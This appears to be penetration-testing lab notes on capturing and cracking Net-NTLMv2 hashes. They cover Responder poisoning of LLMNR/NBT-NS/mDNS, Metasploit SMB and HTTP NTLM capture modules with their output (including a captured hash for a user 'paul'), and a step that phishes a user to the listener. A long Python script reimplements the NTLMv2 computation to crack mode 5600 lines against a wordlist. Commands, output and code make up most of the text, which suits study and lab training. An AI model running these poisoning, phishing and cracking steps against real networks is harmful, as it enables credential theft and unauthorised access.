```
# Poison LLMNR/NBT-NS/MDNS on the VPN interface and log every Net-NTLMv2 response it receives
sudo responder -I tun0
# Find the hashcat mode for the captured format (NetNTLMv2 is mode 5600)
hashcat -h | grep -i "ntlm"
# --force only suppresses hashcat's warnings (e.g. about the OpenCL runtime); it does not fix them
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
```
```
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set srvhost 192.168.45.159
srvhost => 192.168.45.159
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john_smb
JOHNPWFILE => /tmp/john_smb
msf6 auxiliary(server/capture/smb) > exploit
[*] Auxiliary module running as background job 0.
[*] JTR hashes will be split into two files depending on the hash format.
[*] /tmp/john_smb_netntlm for NTLMv1 hashes.
[*] /tmp/john_smb_netntlmv2 for NTLMv2 hashes.
[*] Server is running. Listening on 192.168.45.159:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
msf6 auxiliary(spoof/nbns/nbns_response) > set SPOOFIP 192.168.45.159
SPOOFIP => 192.168.45.159
msf6 auxiliary(spoof/nbns/nbns_response) > set INTERFACE tun0
INTERFACE => tun0
msf6 auxiliary(spoof/nbns/nbns_response) > run
[*] Auxiliary module running as background job 2.
[-] Auxiliary failed: PCAPRUB::BPFError invalid bpf filter: ethernet addresses supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:139:in `setfilter'
msf6 auxiliary(spoof/nbns/nbns_response) > [-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:139:in `open_pcap'
[-] /usr/share/metasploit-framework/modules/auxiliary/spoof/nbns/nbns_response.rb:145:in `run'
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 192.168.219.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash : paul::FILES01:37deabe5fef5e9ae:6cf8e75e1fa372f9bdd3d2c687519959:…
```

The nbns_response module fails here because tun0 is a TUN (layer 3 only) interface with no Ethernet header, so the module's pcap filter on Ethernet addresses cannot be compiled; it needs a real Ethernet-type interface on the target's broadcast segment. The SMB capture server is unaffected: when a client from 192.168.219.211 connects to the share, it still logs paul's Net-NTLMv2 response in the same `user::domain:challenge:ntproofstr:blob` format that hashcat mode 5600 expects.
```
msf6 > use auxiliary/server/capture/http_ntlm
msf6 auxiliary(server/capture/http_ntlm) > set srvhost 192.168.45.159
srvhost => 192.168.45.159
msf6 auxiliary(server/capture/http_ntlm) > set SRVPORT 80
SRVPORT => 80
msf6 auxiliary(server/capture/http_ntlm) > set URIPATH /
URIPATH => /
msf6 auxiliary(server/capture/http_ntlm) > set JOHNPWFILE /home/kali/
JOHNPWFILE => /home/kali/
msf6 auxiliary(server/capture/http_ntlm) > exploit
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/http_ntlm) >
[*] Using URL: http://192.168.45.159/
[*] Server started.
[*] 2023-05-23 02:09:31 -0400
NTLMv2 Response Captured from FILES01
DOMAIN:  USER: paul
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:e0f7edf0bb767cbd51e727f62b6722c4 NT_CLIENT_CHALLENGE:01010000000000005bc6d7223d8dd9015bebf059764da56f0000000002000c0044004f004d00410049004e000000000000000000
```
Once the module is configured and running, the attacking host serves an HTTP listener on port 80. All that remains is to phish the target user into visiting that URL. When the user opens it, the server answers with an NTLM authentication challenge and the browser shows a login prompt (a browser that treats the host as part of its intranet zone may instead answer silently with the logged-on user's credentials). As soon as the browser sends its NTLM response, the module logs the Net-NTLMv2 hash; the login does not have to succeed, because all the module needs is the client's reply to the challenge.
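The Responder line, the SMB capture server's `[SMB] NTLMv2-SSP Hash` line and the NTHASH / NT_CLIENT_CHALLENGE pair printed by http_ntlm are all the same artefact: a Net-NTLMv2 response in hashcat mode 5600 format. The following Python is an added example, not code from these notes or from Responder, Metasploit or hashcat; it reproduces the check that `hashcat -m 5600` performs for each candidate password (NT hash, NTOWFv2, NTProofStr), parses a 5600 line, and rebuilds one from the http_ntlm fields. Assumptions: the known-answer data is the [MS-NLMP] section 4.2.4 test vector; the "paul" capture is constructed with a made-up password and client challenge rather than the real one captured above; and 1122334455667788 is assumed to be the http_ntlm module's default CHALLENGE value (confirm with `show options` before relying on it). Beyond the page's own case, `crack_5600` handles any 5600 line, including an empty domain as http_ntlm printed it.

```python
"""Offline verification of a captured Net-NTLMv2 response (hashcat mode 5600 format).

Added example; not code from these notes, Responder, Metasploit or hashcat. It reproduces the
check that `hashcat -m 5600` performs for each candidate password.
"""
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320): hashlib's 'md4' is often disabled on OpenSSL 3 builds."""
    M = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & M
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (boolean function, additive constant, per-step shifts, message-word order)
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & M, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so the next step updates the old d
        a, b, c, d = (a + aa) & M, (b + bb) & M, (c + cc) & M, (d + dd) & M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); the key material every NTLMv2 response is derived from."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)); the domain keeps its case."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()


def nt_proof(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, server challenge || blob): the 16 bytes a cracker compares."""
    return hmac.new(ntlmv2_hash(password, user, domain), challenge + blob, "md5").digest()


def parse_5600(line: str) -> dict:
    """Split 'user::domain:challenge:ntproofstr:blob' as written by Responder and read by -m 5600."""
    user, _, domain, chal, proof, blob = line.strip().split(":", 5)
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack_5600(line: str, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches the capture, else None."""
    h = parse_5600(line)
    for pw in wordlist:
        if hmac.compare_digest(nt_proof(pw, h["user"], h["domain"], h["challenge"], h["blob"]), h["proof"]):
            return pw
    return None


def make_capture(user, domain, password, challenge, client_challenge, av_pairs=bytes(4), time=bytes(8)):
    """Build a 5600 line the way a client answers (constructed test data, not a real capture).
    av_pairs must end with the 4-byte MsvAvEOL terminator; time is the 8-byte FILETIME field."""
    blob = b"\x01\x01" + bytes(6) + time + client_challenge + bytes(4) + av_pairs + bytes(4)
    proof = nt_proof(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


def msf_http_ntlm_to_5600(user, domain, nthash_hex, nt_client_challenge_hex, challenge_hex="1122334455667788"):
    """Rebuild a 5600 line from what auxiliary/server/capture/http_ntlm prints: NTHASH is the
    NTProofStr and NT_CLIENT_CHALLENGE is the blob. The server challenge is the module's CHALLENGE
    option; 1122334455667788 is assumed to be its default, so confirm it with `show options`."""
    return f"{user}::{domain}:{challenge_hex}:{nthash_hex}:{nt_client_challenge_hex}"


# Known-answer vector from [MS-NLMP] 4.2.4: user "User", domain "Domain", password "Password",
# server challenge 0123456789abcdef, client challenge aa*8, time 0, target info Domain/Server.
SPEC_BLOB = bytes.fromhex(
    "0101000000000000" "0000000000000000" "aaaaaaaaaaaaaaaa" "00000000"
    "02000c0044006f006d00610069006e00" "01000c00530065007200760065007200" "00000000" "00000000")
SPEC_LINE = "User::Domain:0123456789abcdef:68cd0ab851e51c96aabc927bebef6a1c:" + SPEC_BLOB.hex()

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("MS-NLMP vector cracked as:", crack_5600(SPEC_LINE, ["hunter2", "Password"]))
    # Constructed capture for the user seen above; the password and client challenge are made up.
    cap = make_capture("paul", "FILES01", "Welcome1", bytes.fromhex("37deabe5fef5e9ae"), b"\xaa" * 8)
    print(cap)
    print("constructed capture cracked as:", crack_5600(cap, ["123456", "Welcome1"]))
```

Two things the code makes visible that the tool output hides: the server challenge is part of the keyed material, so a 5600 line rebuilt from http_ntlm output is only crackable if the CHALLENGE value is the one the module actually sent, and the user name is upper-cased while the domain is not, which is why a hash captured with a mis-cased domain will not crack even with the right password.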